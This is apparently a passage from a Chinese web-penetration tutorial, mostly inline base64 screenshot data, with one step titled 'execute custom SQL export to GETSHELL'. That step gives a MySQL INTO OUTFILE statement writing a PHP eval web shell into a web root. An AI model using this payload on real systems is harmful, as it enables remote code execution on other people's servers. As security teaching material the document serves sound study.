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" alt="" />

0x5: 执行自定义SQL导出GETSHELL

select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'c:/WEB ROOT PATH/xiaohan.php' 

aaarticlea/png;base64,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